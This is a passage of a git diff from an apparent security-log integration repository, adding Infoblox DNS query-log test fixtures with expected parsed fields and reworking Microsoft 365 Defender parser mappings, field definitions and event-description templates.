"header_flags": [], + "question": { + "class": "IN", + "name": "test.org", + "registered_domain": "test.org", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 12337 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_4.json b/Infoblox/ddi/tests/query_log_dns_4.json new file mode 100644 index 000000000..e52e2b96b --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_4.json @@ -0,0 +1,37 @@ +{ + "input": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A" + }, + "expected": { + "message": "client 192.168.1.1#37188: UDP: query: _ldap._tcp.test.test.net IN SRV response: NXDOMAIN +A", + "dns": { + "header_flags": [], + "question": { + "class": "IN", + "name": "_ldap._tcp.test.test.net", + "registered_domain": "test.net", + "subdomain": "_ldap._tcp.test", + "top_level_domain": "net", + "type": "SRV" + }, + "response_code": "NXDOMAIN", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "_ldap._tcp.test.test.net" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37188 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json new file mode 100644 index 000000000..e8b9350f6 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_5.json @@ -0,0 +1,46 @@ +{ + "input": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io." + }, + "expected": { + "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io.", + "dns": { + "answers": [ + { + "class": "IN", + "data": "test.test.io.", + "name": "test.test.io.", + "ttl": 86400, + "type": "CNAME" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.io", + "registered_domain": "test.io", + "subdomain": "test", + "top_level_domain": "io", + "type": "AAAA" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.test.io" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 37521 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json new file mode 100644 index 000000000..c3e9d8ddc --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_6.json @@ -0,0 +1,81 @@ +{ + "input": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1" + }, + "expected": { + "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1", + "dns": { + "answers": [ + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.test.org.", + "ttl": 365, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "test.test.org", + "registered_domain": "test.org", + "subdomain": "test", + "top_level_domain": "org", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.test.org" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 40432 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json new file mode 100644 index 000000000..7e8b80b01 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_7.json @@ -0,0 +1,115 @@ +{ + "input": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;" + }, + "expected": { + "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;", + "dns": { + "answers": [ + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 11720, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "c8.c3r2fb7.81hxxxxxx.dev.", + "ttl": 67, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 52, + "type": "CNAME" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "xxxxxx.dev.", + "ttl": 235, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "test.dev", + "registered_domain": "test.dev", + "top_level_domain": "dev", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "test.dev" + ], + "ip": [ + "192.168.1.1" + ] + }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1", + "port": 49943 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_8.json b/Infoblox/ddi/tests/query_log_dns_8.json new file mode 100644 index 000000000..72f737796 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_8.json @@ -0,0 +1,45 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;", + "@timestamp": "2024-11-28T15:26:27.498000Z", + "dns": { + "answers": [ + { + "class": "IN", + "data": "10.56.12.201", + "name": "test.dev.", + "ttl": 3600, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "PD2LORA2.enim.l2", + "subdomain": "PD2LORA2.enim", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "PD2LORA2.enim.l2" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 36615 + } + } +} \ No newline at end of file diff --git a/Infoblox/ddi/tests/query_log_dns_9.json b/Infoblox/ddi/tests/query_log_dns_9.json new file mode 100644 index 000000000..ae3c85ca0 --- /dev/null +++ b/Infoblox/ddi/tests/query_log_dns_9.json @@ -0,0 +1,124 @@ +{ + "input": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;" + }, + "expected": { + "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;", + "@timestamp": "2024-11-28T15:26:27.359000Z", + "dns": { + "answers": [ + { + "class": "IN", + "data": "www-www.bing.com.trafficmanager.net.", + "name": "www.bing.com.", + "ttl": 7072, + "type": "CNAME" + }, + { + "class": "IN", + "data": "www.bing.com.edgekey.net.", + "name": "www-www.bing.com.trafficmanager.net.", + "ttl": 56, + "type": "CNAME" + }, + { + "class": "IN", + "data": "e86303.test.xxxxx.net.", + "name": "www.bing.com.edgekey.net.", + "ttl": 7154, + "type": "CNAME" + }, + { + "class": "IN", + "data": "1.2.3.181", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.173", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.184", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.185", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.174", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.183", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.177", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.179", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + }, + { + "class": "IN", + "data": "1.2.3.175", + "name": "e86303.test.xxxxx.net.", + "ttl": 17, + "type": "A" + } + ], + "header_flags": [], + "question": { + "class": "IN", + "name": "www.bing.com", + "registered_domain": "bing.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "response_code": "NOERROR", + "type": "query" + }, + "network": { + "transport": "udp" + }, + "related": { + "hosts": [ + "www.bing.com" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 63175 + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 3a95175de..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -777,6 +777,11 @@ microsoft.defender.observer.interface.type: name: microsoft.defender.observer.interface.type type: keyword +microsoft.defender.operation.properties: + description: Additional properties of the operation + name: microsoft.defender.operation.properties + type: object + microsoft.defender.report.id: description: Unique identifier for the event name: microsoft.defender.report.id @@ -816,6 +821,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/_meta/manifest.yml b/Microsoft/microsoft-365-defender/_meta/manifest.yml index 8c04f8c1a..9ce3b7c52 100644 --- a/Microsoft/microsoft-365-defender/_meta/manifest.yml +++ b/Microsoft/microsoft-365-defender/_meta/manifest.yml @@ -1,10 +1,10 @@ uuid: 05e6f36d-cee0-4f06-b575-9e43af779f9f -name: Microsoft 365 Defender +name: Microsoft Defender XDR / Microsoft 365 Defender slug: microsoft-365-defender automation_connector_uuid: 57f8f587-18ee-434b-a4ed-b5459f5b0fef automation_module_uuid: 525eecc0-9eee-484d-92bd-039117cf4dac description: >- - Microsoft 365 Defender is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. + Microsoft Defender XDR is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications. Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats. data_sources: diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 21e3caf3c..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -1,4 +1,25 @@ [ + { + "value": "A new {action.type} cloud app event have been received", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" } + ] + }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ @@ -132,6 +153,35 @@ } ] }, + { + "value": "{user.domain}\\{user.name} failed to log on {host.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "device_logon_events" + }, + { + "field": "host.name" + }, + { + "field": "user.name" + }, + { + "field": "user.domain" + }, + { + "field": "action.type", + "value": "LogonFailed" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on {host.name}", "conditions": [ @@ -402,6 +452,28 @@ { "field": "email.to.address" } ] }, + { + "value": "{event.action} email from {email.from.address} to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" }, + { "field": "email.to.address" } + ] + }, + { + "value": "{event.action} email from {email.from.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" } + ] + }, + { + "value": "{event.action} email to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.to.address" } + ] + }, { "value": "{action.type} on {url.original}", "conditions": [ diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f22b21ce1..d212bdb11 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -40,6 +40,10 @@ pipeline: input_field: "{{json_event.message.properties.RawEventData.Data}}" output_field: "data" - name: set_common_fields + - name: set_process_events + filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' + - name: set_process_deviceprocess_events + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields @@ -126,22 +130,6 @@ stages: host.os.full: "{{json_event.message.properties.OSPlatform}}" host.os.version: "{{json_event.message.properties.OSVersion}}" host.type: "{{json_event.message.properties.DeviceType}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" registry.data.type: "{{json_event.message.properties.RegistryValueType}}" registry.key: "{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" @@ -166,18 +154,6 @@ stages: action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}" action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}" action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}" - action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}" action.properties.Location: "{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" @@ -250,15 +226,117 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' + - set: + network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" + filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + - set: + microsoft.defender.operation.properties: > + { + {%- for property in json_event.message.properties.RawEventData.OperationProperties -%} + {%- if property.Value != null -%} + {%- if property.Value | from_json == None -%} + "{{property.Name}}":"{{property.Value}}", + {%- else -%} + "{{property.Name}}": {{property.Value | from_json}}, + {%- endif -%} + {%- endif -%} + {%- endfor -%} + } + filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + + set_process_events: + actions: + - set: + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + - set: process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + - set: process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + + set_process_deviceprocess_events: + actions: - set: - network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" - filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' + process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.name: "{{json_event.message.properties.FileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and 